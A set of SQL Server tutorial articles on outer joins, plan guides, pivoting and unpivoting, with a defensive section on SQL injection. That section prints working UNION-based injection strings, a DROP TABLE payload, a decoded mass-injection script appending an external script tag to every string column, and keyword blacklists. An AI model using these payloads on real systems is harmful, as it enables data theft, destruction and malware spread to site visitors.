
Outer Joins

Outer joins are one of the most widely misunderstood table operators. As useful as they are, it is very easy to apply predicates incorrectly in outer join queries and introduce logical bugs that are difficult to troubleshoot (or to spend hours trying to figure out why a particular query does not produce the desired results). This article demonstrates common misunderstandings about outer joins and how to use them properly.

First, let’s start with an explanation of the logical processing of a query (listing here only the steps related to outer join operators; for a full explanation of logical query processing, read Anatomy of a Query).

1). FROM/CROSS JOIN: The FROM clause is processed to identify source tables; a cross join (Cartesian product) is formed between the two tables involved in the table operator.

2). ON: The ON clause predicates are applied and only rows that satisfy the predicate(s) (for which the predicates evaluate to TRUE) are included in the temporary result set.

3). ADD OUTER ROWS: The left side table in a LEFT OUTER JOIN and the right side table in a RIGHT OUTER JOIN (or both tables in a FULL OUTER JOIN) are the preserved tables. That means all rows (and selected attribute values) from the preserved table(s) are present in the result set after the outer join operator is applied. At this phase the rows from the preserved table(s) that did not match based on the ON clause predicates are added back. For those rows the attributes coming from the non-preserved table are filled with NULLs.

4). WHERE: The predicates in the WHERE clause are applied and only rows for which the predicates evaluate to TRUE are included in the temporary result set.

The process repeats for any other table operators in the FROM clause taking the temporary result set from the prior table operator as left input.

The key is to understand phases 2, 3, and 4 well, and how filtering affects the result set. To illustrate this with an example, let’s create two tables for loans and customers. Each customer can have personal or business loans (or both), or no loans at all.

CREATE TABLE Loans (

loan_nbr INT NOT NULL,

customer_nbr INT NOT NULL,

loan_date DATETIME NOT NULL,

loan_amount DECIMAL(15, 2) NOT NULL,

loan_type CHAR(1) NOT NULL,

CONSTRAINT ck_loan_type

CHECK (loan_type IN ('P', 'B')), -- P=Personal; B=Business

CONSTRAINT pk_loans

PRIMARY KEY (loan_nbr));






INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(1, 1, '20080101', 1500.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(2, 2, '20080215', 1000.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(3, 1, '20080311', 5000.00, 'B');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(4, 3, '20080312', 2000.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(5, 4, '20080325', 1200.00, 'P');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(6, 3, '20080327', 4000.00, 'B');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(7, 5, '20080410', 3500.00, 'B');

INSERT INTO Loans

(loan_nbr, customer_nbr, loan_date, loan_amount, loan_type)

VALUES(8, 2, '20080412', 2000.00, 'P');




CREATE TABLE Customers (

customer_nbr INT NOT NULL,

customer_name VARCHAR(35),

PRIMARY KEY (customer_nbr));




INSERT INTO Customers (customer_nbr, customer_name)

VALUES(1, 'Peter Brown');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(2, 'Jeff Davis');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(3, 'Kevin Fox');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(4, 'Donna Louis');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(5, 'Greg Barrow');

INSERT INTO Customers (customer_nbr, customer_name)

VALUES(6, 'Richard Douglas');


-- Add foreign key for Loans

ALTER TABLE Loans

ADD CONSTRAINT fk_loans_customers

FOREIGN KEY (customer_nbr)

REFERENCES Customers(customer_nbr);

CASE #1: Predicates on the non-preserved table attributes

The first request is to retrieve a list of all customers and the total personal loan amount (if any) each of them has. The following query seems to describe the request properly:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

WHERE L.loan_type = 'P'

GROUP BY C.customer_name

ORDER BY customer_name;

However, the results do not seem correct:

customer_name    total

---------------- --------

Donna Louis 1200.00

Jeff Davis 3000.00

Kevin Fox 2000.00

Peter Brown 1500.00

Customers Greg and Richard are missing from the output. To understand the problem, let’s walk through the logical processing step by step:

1). Cross join:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

CROSS JOIN Loans AS L;

This returns the Cartesian product (every possible combination of a row from the Customers table and a row from the Loans table).

2). ON predicates:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

INNER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr;

This results in the following output:

customer_name   loan_amount  loan_type

--------------- ------------ ---------

Peter Brown 1500.00 P

Jeff Davis 1000.00 P

Peter Brown 5000.00 B

Kevin Fox 2000.00 P

Donna Louis 1200.00 P

Kevin Fox 4000.00 B

Greg Barrow 3500.00 B

Jeff Davis 2000.00 P

At this stage only the rows that match based on the customer predicate in the ON clause are included.

3). Add outer rows:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr;

The query returns this result set:

customer_name   loan_amount   loan_type

--------------- ------------- ---------

Peter Brown 1500.00 P

Peter Brown 5000.00 B

Jeff Davis 1000.00 P

Jeff Davis 2000.00 P

Kevin Fox 2000.00 P

Kevin Fox 4000.00 B

Donna Louis 1200.00 P

Greg Barrow 3500.00 B

Richard Douglas NULL NULL

Here the outer rows are added, resulting in adding back a row for customer Richard, who has no loans at all and was excluded in the prior phase when the ON clause predicates were applied.

4). WHERE predicates:

SELECT C.customer_name, L.loan_amount, L.loan_type

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

WHERE L.loan_type = 'P';

This result set is the basis for the results of the first query attempt:

customer_name   loan_amount  loan_type

--------------- ------------ ---------

Peter Brown 1500.00 P

Jeff Davis 1000.00 P

Kevin Fox 2000.00 P

Donna Louis 1200.00 P

Jeff Davis 2000.00 P

Now it is very clear that the predicate in the WHERE clause filters out the NULL loan type for customer Richard, and customer Greg is excluded because he has only business loans. Incorrectly placing the predicate in the WHERE clause effectively turns the outer join into an inner join.

Correcting this query only requires moving the predicate on loan type from the WHERE clause to the ON clause:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

AND L.loan_type = 'P'

GROUP BY C.customer_name

ORDER BY customer_name;

This produces the correct result set, listing all customers and their total personal loan amount:

customer_name    total

---------------- --------

Donna Louis 1200.00

Greg Barrow 0.00

Jeff Davis 3000.00

Kevin Fox 2000.00

Peter Brown 1500.00

Richard Douglas 0.00
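An equivalent way to express the same request (shown here as a sketch of an alternative, not the only correct form) is to apply the loan type filter to the non-preserved table in a derived table before the outer join; that way the filter cannot eliminate preserved rows:

-- Filter Loans down to personal loans first, then outer join
SELECT C.customer_name,
       SUM(COALESCE(L.loan_amount, 0)) AS total
FROM Customers AS C
LEFT OUTER JOIN (SELECT customer_nbr, loan_amount
                 FROM Loans
                 WHERE loan_type = 'P') AS L
  ON C.customer_nbr = L.customer_nbr
GROUP BY C.customer_name
ORDER BY customer_name;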

CASE #2: Predicates on the preserved table attributes

Let’s look at another example demonstrating how filtering affects the preserved table attributes. The request is to retrieve the total loan amount for customer Richard Douglas, even if Richard does not have any loans at all. Since Richard’s information must always be returned, the following query seems to satisfy the request:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

AND C.customer_name = 'Richard Douglas'

GROUP BY C.customer_name

ORDER BY customer_name;

However, the result set returns information for all customers:

customer_name   total

--------------- -----

Donna Louis 0.00

Greg Barrow 0.00

Jeff Davis 0.00

Kevin Fox 0.00

Peter Brown 0.00

Richard Douglas 0.00

As explained earlier, the reason is that the outer rows are added back after the ON clause predicates are applied, so all the other customers reappear as outer rows. Getting only Richard’s loan information requires moving the predicate on customer name to the WHERE clause:

SELECT C.customer_name,

SUM(COALESCE(L.loan_amount, 0)) AS total

FROM Customers AS C

LEFT OUTER JOIN Loans AS L

ON C.customer_nbr = L.customer_nbr

WHERE C.customer_name = 'Richard Douglas'

GROUP BY C.customer_name

ORDER BY customer_name;

This results in correctly returning only Richard’s loan information:

customer_name    total

---------------- -----

Richard Douglas 0.00

Plan Freezing

Plan freezing refers to forcing a plan for a specific query. There are different reasons to freeze a plan; one is to provide plan stability when solving parameter sniffing issues.

This functionality was first introduced in SQL Server 2005 via the USE PLAN query hint or a plan guide that forces a plan. However, using this feature was rather difficult because it required capturing the exact SQL statement, which was normally done with a SQL Profiler trace or by querying the dynamic management objects. Another issue was that changing the metadata (like dropping an index that affects the plan) resulted in an error when trying to use the plan guide.

SQL Server 2008 added an array of enhancements. First, it simplified the mechanism for creating a plan guide from a plan handle via the sp_create_plan_guide_from_handle stored procedure, which eliminates the need to extract and match the SQL statement. Another enhancement is that if the metadata changes, the plan guide is silently skipped and query execution continues with whatever execution plan is best.

Below is an example of utilizing the new capabilities in SQL Server 2008 to freeze a plan.

-- Clear procedure cache

DBCC FREEPROCCACHE;





GO



-- First query run to get plan for freezing

SET STATISTICS XML ON;





EXEC sp_executesql   

N'SELECT orderid, customerid, orderdate, shippeddate

FROM Orders

WHERE customerid = N''CACYK'''
;

   

SET STATISTICS XML OFF;



GO



-- Create plan guide based on plan handle

DECLARE @plan_handle VARBINARY(64);





SELECT @plan_handle = plan_handle

FROM sys.dm_exec_query_stats AS S

CROSS APPLY sys.dm_exec_sql_text(S.sql_handle) AS T

WHERE text LIKE '%Order%';





EXEC sp_create_plan_guide_from_handle 'PlanGuide2008', @plan_handle = @plan_handle;





GO





-- Check that plan guide was created

SELECT * FROM sys.plan_guides;





GO



-- Execute and verify UsePlan="1" and PlanGuideName="PlanGuide2008" 

-- in the XML plan output 



SET STATISTICS XML ON;





EXEC sp_executesql   

N'SELECT orderid, customerid, orderdate, shippeddate

FROM Orders

WHERE customerid = N''CACYK'''
;        

   

SET STATISTICS XML OFF;





GO





EXEC sp_control_plan_guide N'DROP', N'PlanGuide2008';
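As a side note, sp_control_plan_guide accepts other control options besides N'DROP'; for example, a plan guide can be temporarily disabled and later re-enabled instead of being dropped:

-- Disable the plan guide without dropping it, then re-enable it
EXEC sp_control_plan_guide N'DISABLE', N'PlanGuide2008';

EXEC sp_control_plan_guide N'ENABLE', N'PlanGuide2008';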

SQL Injection

What is SQL Injection? Here is the definition from Wikipedia (http://en.wikipedia.org/wiki/SQL_injection):

“SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.”

Why another article on SQL Injection? Because no matter how much is written about it, developers still produce code that is susceptible to SQL injection attacks. The following is a dissection of a typical Web site vulnerable to SQL injection, with a step-by-step example of what could happen, and protection methods.

Disclaimer: before even starting, it is important to emphasize that the solution to SQL injection is parameterization! Period! But… what if the client API does not support parameterization? Or the project is so large that changing all occurrences of bad code would require a massive code rewrite that may not be feasible at the moment? This is where methods like string filtering fit in.

The example in this article uses the SQL Server sample database AdventureWorks (http://www.codeplex.com/SqlServerSamples).

Let’s start with a very trivial example of product search. The implementation is in C#:

string cmdStr @"SELECT Name, ProductNumber, Color

                  FROM Production.Product 

                  WHERE Name LIKE '%" 
SearchText.Text "%'";



using (SqlConnection conn = new SqlConnection(connStr))

using (SqlDataAdapter sda = new SqlDataAdapter(cmdStr, conn))

{

DataTable dtProducts = new DataTable();



sda.Fill(dtProducts);



return dtProducts.DefaultView;

}

How simple and innocent! A couple of lines of code and our search function is done. We simply let the user type any search criteria and create a dynamic query to search all products.

A good user may type “ball” in the search text box and get the following results:

Name                   ProductNumber    Color

-------------------    ---------------  -------

BB Ball Bearing        BE-2349    

Bearing Ball           BA-8327  

Headset Ball Bearings  BE-2908

But here comes someone with not-so-good intentions. Instead of searching for “ball”, the bad guy may type:

ZZZ' UNION SELECT name, CAST(id AS VARCHAR(10)), '' FROM sysobjects WHERE xtype ='U' --

Clever! The attacker noticed from the original search that three columns are returned and formed a query to union the list of all user tables in the current database into the result set. First, the value ZZZ is added as search criteria, then the query to extract the user tables is injected, and finally the comment at the end trims the remainder of the original query. Now the result looks as follows:

Name                ProductNumber     Color 

-----------------   ----------------  -------

Address             53575229   

AddressType         101575400   

AWBuildVersion      149575571   

BillOfMaterials     181575685   

Contact             309576141   

ContactCreditCard   405576483   

ContactType         437576597

Once the user tables are known, the next step could be the following search string:

ZZZ' UNION SELECT COLUMN_NAME, DATA_TYPE, TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Address' --

This time the search results return the columns information for the Address user table:

Name               ProductNumber     Color 

----------------   ----------------  --------

AddressID          int               Person 

AddressLine1       nvarchar          Person 

AddressLine2       nvarchar          Person 

City               nvarchar          Person 

ModifiedDate       datetime          Person 

PostalCode         nvarchar          Person 

rowguid            uniqueidentifier  Person 

StateProvinceID    int               Person

Going one step further, the malicious user can start extracting data:

ZZZ' UNION SELECT AddressLine1, City, PostalCode FROM Person.Address --

This results in listing the address data from the Address table:

Name                            ProductNumber          Color 

-----------------------------   ---------------------  --------

#500-75 O'Connor Street         Ottawa                 K4B 1S2 

#9900 2700 Production Way       Burnaby                V5A 4X1 

00, rue Saint-Lazare            Dunkerque              59140 

02, place de Fontenoy           Verrieres Le Buisson   91370 

035, boulevard du Montparnasse  Verrieres Le Buisson   91370

So far the SQL injection attacker has only been exploring data. But things can get really unpleasant if the attacker starts updating or deleting data, or even dropping tables. The following search text will drop a table with credit card info (if it exists):

ZZZ'; DROP TABLE CreditCardInfo --

All this should convince every developer that SQL injection is a very serious threat that should not be taken lightly.

Solutions

SQL injection can be handled on both the client and the server side. The following techniques demonstrate how to accomplish that.

Client Side Filtering

Client APIs normally provide a variety of methods to filter user input: regular expressions, limiting the size of the search arguments, filtering for dangerous keywords, etc. Here is an example of creating a black list of keywords that will be filtered from the user input:

public static string[] blackList =

       {"--", ";--", ";", "/*", "*/", "@@", "@",

        "char", "nchar", "varchar", "nvarchar",

        "alter", "begin", "cast", "create", "cursor",

        "declare", "delete", "drop", "end", "exec", "execute",

        "fetch", "insert", "kill", "open",

        "select", "sys", "sysobjects", "syscolumns",

        "table", "update"};



private bool CheckInput(string SearchText)

{

for (int i = 0; i < blackList.Length; i++)

{

if (SearchText.IndexOf(blackList[i],

                  StringComparison.OrdinalIgnoreCase) >= 0)

{

HttpContext.Current.Response.Redirect("~/Error.aspx");

return false;

}

}

return true;

}

The CheckInput function checks the user input for any of the words on the black list and, if one is found, redirects to an error page. The search function then looks like this:

string cmdStr @"SELECT Name, ProductNumber, Color

                  FROM Production.Product 

                  WHERE Name LIKE '%" 
SearchText.Text "%'";



if(CheckInput(SearchText.Text))

{

using (SqlConnection conn = new SqlConnection(connStr))

using (SqlDataAdapter sda = new SqlDataAdapter(cmdStr, conn))

{

DataTable dtProducts = new DataTable();



sda.Fill(dtProducts);



return dtProducts.DefaultView;

}

}

else

{

DataTable dtProducts = new DataTable();

return dtProducts.DefaultView;

}

Parameterization

Most client APIs (including .NET) support parameterization of queries, which allows embedding the user input as parameters. A parameter is a placeholder for a user-entered value that is supplied at execution time. That way the user cannot inject SQL code, because the whole user entry is treated as the value of the parameter, not as a string appended to the query. Again, parameterization is the best defense against SQL injection attacks.

Here is how the same search code looks with a parameterized query (for simplicity we use an ad hoc query, but this could be a stored procedure):

string cmdStr @"SELECT Name, ProductNumber, Color

                  FROM Production.Product 

                  WHERE Name LIKE '%' + @SearchText + '%'"
;



using (SqlConnection conn = new SqlConnection(connStr))

using (SqlDataAdapter sda = new SqlDataAdapter(cmdStr, conn))

{

DataTable dtProducts = new DataTable();



SqlParameter parm = sda.SelectCommand.Parameters.Add("@SearchText",
                          SqlDbType.VarChar, 50);

parm.Value = SearchText.Text;



sda.Fill(dtProducts);



return dtProducts.DefaultView;

}

Attempts to enter the same malicious search text now result in no output, as there is no product with such a name.

Server Side Filtering

Filtering can also be implemented on the server side, very similar to the client side black list. Here is a fragment of code that can be added to the beginning of stored procedures to verify the search string entered by the user:

IF   UPPER(@SearchText) LIKE UPPER(N'%0x%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%;%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%''%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%--%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%/*%*/%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%EXEC %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%xp[_]%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%sp[_]%')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%SELECT %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%INSERT %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%UPDATE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%DELETE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%TRUNCATE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%CREATE %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%ALTER %')

  OR 
UPPER(@SearchText) LIKE UPPER(N'%DROP %')

BEGIN

  RAISERROR('Possible SQL Injection attempt.', 16, 1);

  
RETURN;

END

Of course, ultimately the search can be implemented as a stored procedure with a parameter, and without dynamic SQL:

CREATE PROCEDURE ProductSearch

 
@SearchText VARCHAR(200)

AS

 SELECT Name, ProductNumber, Color 

 FROM Production.Product 

 WHERE Name LIKE '%' + @SearchText + '%';
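When dynamic SQL cannot be avoided on the server side, the same principle applies there: pass the user input as a parameter to sp_executesql instead of concatenating it into the statement. Here is a minimal sketch (the procedure name ProductSearchDynamic is just an illustration):

CREATE PROCEDURE ProductSearchDynamic
  @SearchText VARCHAR(200)
AS
DECLARE @sql NVARCHAR(500);

-- The user input is bound as a parameter, never concatenated into @sql
SET @sql = N'SELECT Name, ProductNumber, Color
             FROM Production.Product
             WHERE Name LIKE ''%'' + @Search + ''%'';';

EXEC sp_executesql @sql, N'@Search VARCHAR(200)', @Search = @SearchText;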

Secondary Injection Attacks

Recently there has been a new wave of SQL injection attacks that utilize a delayed action technique. The way the web site is exploited is the same: looking for any non-parameterized and non-filtered queries and injecting a portion of code that will be executed by SQL Server. However, in this attack the injected code simply loops through all user tables and appends some HTML or JavaScript code to all string columns. This has a dual effect: your data is no longer what you think it is, and if this data is displayed on a Web page, the HTML or JavaScript code becomes part of your Web page.

Here are the steps to illustrate this. Normally attackers search for URLs that pass user input directly via a URL query string. That makes it very easy to inject SQL code as part of the URL. It could look like this (abbreviated):

DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300...7200%20AS%20NVARCHAR(4000));EXEC(@S);--

After the encoding is removed and the string is passed to SQL Server, it looks like this:

DECLARE @S NVARCHAR(4000); 

SET @S=CAST(0x440045004300...7200 AS NVARCHAR(4000)); 

EXEC(@S);--

Decoding the hex value reveals the actual SQL code that will be executed:

DECLARE @T varchar(255), @C varchar(255)

DECLARE Table_Cursor CURSOR FOR 

select 
a.name,b.name from sysobjects a,syscolumns b 

where a.id=b.id and a.xtype='u' and 

(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C 

WHILE(@@FETCH_STATUS=0) BEGIN 

exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+

']))+''<script src=http://www.211796*.net/f****p.js></script>''')

FETCH NEXT FROM  Table_Cursor INTO @T,@C 

END 

CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

In short, the script loops through all tables in the database, looks for string columns, and then appends the HTML or JavaScript code.

One very unpleasant effect of this attack is that pages with such content are normally treated by major search engines as threats, and are very likely to be considered malicious and removed from their indexes.

The same techniques described earlier can be used to prevent secondary SQL injection attacks.

Tools

Here are some tools that can help prevent and detect SQL injection attacks:

– Microsoft Source Code Analyzer for SQL Injection
New static analysis tool that identifies SQL injection vulnerabilities in ASP source code and suggests fixes. Enables customers to address the vulnerability at the source.
http://support.microsoft.com/kb/954476

– URLScan 3.0
Updated version of the IIS tool that acts as a site filter by blocking specific HTTP requests. Can be used to block malicious requests used in this attack.
http://learn.iis.net/page.aspx/473/using-urlscan

– Scrawlr
New scanning tool from Hewlett Packard that scans websites looking for SQL injection vulnerabilities in URL parameters. http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2008/06/24/finding-sql-injection-with-scrawlr.aspx

– SQLInjectionFinder
Tool to help determine .asp pages targeted by recent SQL Injection attacks.
http://www.codeplex.com/Release/ProjectReleases.aspx?ProjectName=WSUS&ReleaseId=13436

Unpivoting Multiple Columns

Unpivoting is the process of normalizing data. In an earlier post I discussed unpivoting a single column. This demonstration shows how to unpivot multiple columns.

The task is to normalize the following denormalized data, which represents product sales volumes by quarter:

product_nbr qtr1   sales_qtr1  qtr2   sales_qtr2  qtr3   sales_qtr3  qtr4   sales_qtr4

----------- ------ ----------- ------ ----------- ------ ----------- ------ -----------

1           2008Q1 100         2008Q2 20          2008Q3 15          2008Q4 10

2           2008Q1 80          2008Q2 15          2008Q3 20          2008Q4 10

3           2008Q1 70          2008Q2 5           2008Q3 10          2008Q4 15

The normalized data set should look like this:

product_nbr qtr    sales

----------- ------ -----------

1           2008Q1 100

1           2008Q2 20

1           2008Q3 15

1           2008Q4 10

2           2008Q1 80

2           2008Q2 15

2           2008Q3 20

2           2008Q4 10

3           2008Q1 70

3           2008Q2 5

3           2008Q3 10

3           2008Q4 15
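The queries below assume the denormalized data is stored in a table named QuarterlySales. For completeness, here is a sketch of its definition and sample rows (the column data types are assumptions):

CREATE TABLE QuarterlySales (
  product_nbr INT NOT NULL PRIMARY KEY,
  qtr1 CHAR(6) NOT NULL, sales_qtr1 INT NOT NULL,
  qtr2 CHAR(6) NOT NULL, sales_qtr2 INT NOT NULL,
  qtr3 CHAR(6) NOT NULL, sales_qtr3 INT NOT NULL,
  qtr4 CHAR(6) NOT NULL, sales_qtr4 INT NOT NULL);

-- Sample data matching the denormalized result set above
INSERT INTO QuarterlySales
VALUES (1, '2008Q1', 100, '2008Q2', 20, '2008Q3', 15, '2008Q4', 10);
INSERT INTO QuarterlySales
VALUES (2, '2008Q1', 80, '2008Q2', 15, '2008Q3', 20, '2008Q4', 10);
INSERT INTO QuarterlySales
VALUES (3, '2008Q1', 70, '2008Q2', 5, '2008Q3', 10, '2008Q4', 15);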

The first method uses a CROSS JOIN with a numbers table (one number for each quarter) and CASE expressions to select the appropriate value (quarter or sales volume) for each quarter.

SELECT product_nbr,

       CASE n

            WHEN 1 THEN qtr1

            WHEN 2 THEN qtr2

            WHEN 3 THEN qtr3

            WHEN 4 THEN qtr4

       END AS qtr,

       CASE n

            WHEN 1 THEN sales_qtr1

            WHEN 2 THEN sales_qtr2

            WHEN 3 THEN sales_qtr3

            WHEN 4 THEN sales_qtr4

       END AS sales

FROM QuarterlySales AS S

CROSS JOIN 

(SELECT 1 UNION 

 SELECT 2 UNION

 SELECT 3 UNION

 SELECT 4) AS Nums(n);

It almost seems natural that we should be able to do the same much more easily using the UNPIVOT operator (introduced in SQL Server 2005). However, one of the limitations of the UNPIVOT operator is that it works only with a single column. But because SQL Server allows multiple table operators in the FROM clause, we can use two UNPIVOT operators. The catch is that the second UNPIVOT operator applies to the virtual table that results from the first UNPIVOT operator. That requires a little trick to extract and match the quarter from the results of each UNPIVOT operator in order to produce the final result. Here is the query using the UNPIVOT operator:

SELECT product_nbr, qtr, sales

FROM 

 (SELECT product_nbr,

         qtr1, sales_qtr1,

         qtr2, sales_qtr2,

         qtr3, sales_qtr3,

         qtr4, sales_qtr4

  FROM QuarterlySales) AS S

UNPIVOT

 (qtr FOR qtrx IN (qtr1, qtr2, qtr3, qtr4)) AS U1

UNPIVOT

 (sales FOR sales_qtrx IN (sales_qtr1, sales_qtr2,

                           sales_qtr3, sales_qtr4)) AS U2

WHERE RIGHT(sales_qtrx, 1) = RIGHT(qtrx, 1);

Pivoting on Multiple Columns

Pivoting data on more than one column is not a common request. But there are times when it is a very useful technique for reporting purposes. Here is one example to demonstrate different methods to handle that.

The goal is to report product data by pivoting columns with value and quantity for each product based on year. Here is the script to create the table and insert sample data.

CREATE TABLE Products (

product VARCHAR(30),

market_year INT,

value INT,

quantity INT,

CONSTRAINT pk_products

PRIMARY KEY (product, market_year));
INSERT INTO Products VALUES('Corn', 2003, 100, 20);
INSERT INTO Products VALUES('Corn', 2004, 200, 25);

INSERT INTO Products VALUES('Corn', 2005, 150, 30);

INSERT INTO Products VALUES('Corn', 2006, 150, 10);

The request is to produce the following output:

product v2003 q2003 v2004 q2004 v2005 q2005 v2006 q2006

------- ----- ----- ----- ----- ----- ----- ----- -----

Corn 100 20 200 25 150 30 150 10

As usual, the first candidate for a pivoting solution is the CASE expression. Using CASE expressions is the most flexible method to manipulate data for pivoting, and there is not much difference between pivoting a single column and multiple columns. Here is the solution with CASE:

SELECT product,

SUM(CASE WHEN market_year = 2003 THEN value ELSE 0 END) AS v2003,

SUM(CASE WHEN market_year = 2003 THEN quantity ELSE 0 END) AS q2003,

SUM(CASE WHEN market_year = 2004 THEN value ELSE 0 END) AS v2004,

SUM(CASE WHEN market_year = 2004 THEN quantity ELSE 0 END) AS q2004,

SUM(CASE WHEN market_year = 2005 THEN value ELSE 0 END) AS v2005,

SUM(CASE WHEN market_year = 2005 THEN quantity ELSE 0 END) AS q2005,

SUM(CASE WHEN market_year = 2006 THEN value ELSE 0 END) AS v2006,

SUM(CASE WHEN market_year = 2006 THEN quantity ELSE 0 END) AS q2006

FROM Products

GROUP BY product;

Next, let's look at the PIVOT operator that was added in SQL Server 2005. The PIVOT operator has a few limitations, and one of them is that it supports pivoting only on a single column. However, T-SQL allows specifying multiple PIVOT operators in the FROM clause, which provides a solution for pivoting on multiple columns. There is one catch: the second PIVOT consumes the temporary result set output by the first PIVOT operator. Because of that, the year column is no longer available (it is used as the pivoting column in the first PIVOT), so a second column that replicates the year values has to be defined. Also, since the first PIVOT operator uses the year values as column names, the new column subtracts 2000 from the year to generate different column names for the second PIVOT operator. Here is the query using two PIVOT operators:

SELECT product,

MAX([2003]) AS v2003,

MAX([3]) AS q2003,

MAX([2004]) AS v2004,

MAX([4]) AS q2004,

MAX([2005]) AS v2005,

MAX([5]) AS q2005,

MAX([2006]) AS v2006,

MAX([6]) AS q2006

FROM (SELECT product, market_year,

market_year - 2000 AS market_year2,

SUM(value) AS value,

SUM(quantity) AS quantity

FROM Products

GROUP BY product, market_year) AS T

PIVOT

(SUM(value) FOR market_year IN

([2003], [2004], [2005], [2006])) AS P1

PIVOT

(SUM(quantity) FOR market_year2 IN

([3], [4], [5], [6])) AS P2

GROUP BY product;

In this particular case there is a more elegant solution using a single PIVOT operator. With a little math, the value and the quantity can be combined into a single column and then, after the pivoting, split back into two separate columns (this works as long as the quantity is always less than 1000). Here is the solution using a single PIVOT operator:

SELECT product,

[2003] / 1000 AS v2003,

[2003] % 1000 AS q2003,

[2004] / 1000 AS v2004,

[2004] % 1000 AS q2004,

[2005] / 1000 AS v2005,

[2005] % 1000 AS q2005,

[2006] / 1000 AS v2006,

[2006] % 1000 AS q2006

FROM (SELECT product, market_year,

value * 1000 + quantity AS value

FROM Products) AS T

PIVOT

(SUM(value) FOR market_year IN

([2003], [2004], [2005], [2006])) AS P;

Dynamic Pivoting

SQL Server 2005 added the PIVOT operator, which makes creating cross-tab queries very easy. However, as of this writing no SQL Server version has built-in support for dynamic pivoting; the PIVOT operator only provides basic pivoting capabilities on a static list of values. In practice it is very often necessary to pivot on a dynamic list of values.

Here is one solution for dynamic pivoting that uses the ability in SQL Server 2005/2008 to concatenate row values using FOR XML PATH with a blank element name. This method queries the distinct values to pivot and creates a column list based on them. The resulting column list is then plugged into a dynamic query utilizing the PIVOT operator, which is executed as dynamic SQL.

In this scenario the goal is to pivot order amounts by month.

-- Table with orders

CREATE TABLE Orders (

  order_id INT NOT NULL PRIMARY KEY,

  order_date DATETIME NOT NULL

            DEFAULT CURRENT_TIMESTAMP,

  amount DECIMAL(8, 2) NOT NULL DEFAULT 0

        CHECK (amount >= 0));

 

-- Sample data

INSERT INTO Orders

(order_id, order_date, amount)

SELECT 1, '20070101', 10.50

UNION ALL

SELECT 2, '20070126', 12.50

UNION ALL

SELECT 3, '20070130', 12.00

UNION ALL

SELECT 4, '20070214', 13.75

UNION ALL

SELECT 5, '20070220', 10.00

UNION ALL

SELECT 6, '20070306', 15.00

UNION ALL

SELECT 7, '20070310', 17.50

UNION ALL

SELECT 8, '20070329', 20.00;

 

-- Build list of column values to pivot

DECLARE @cols NVARCHAR(1000);

SELECT @cols =

STUFF((SELECT N'],[' + year_month

       FROM (SELECT DISTINCT CONVERT(NCHAR(7), order_date, 126)

            FROM Orders) AS O(year_month)

       ORDER BY year_month

       FOR XML PATH('')

      ), 1, 2, '') + N']';

 

-- Build dynamic SQL query for pivoting  

DECLARE @sql NVARCHAR(2000);

SET @sql =

N'SELECT order_year, ' + @cols +

N'FROM (SELECT DATEPART(yyyy, order_date) AS order_year, ' +

            N'CONVERT(NCHAR(7), order_date, 126) AS year_month, ' +

            N'amount ' +

      N'FROM Orders) AS O ' +

N'PIVOT ' +

N'(SUM(amount) FOR year_month IN (' + @cols + N')) AS P;';

 

EXEC(@sql);

 

/*

 

Results:

 

order_year 2007-01 2007-02 2007-03

----------- -------- -------- --------

2007        35.00    23.75    52.50

 

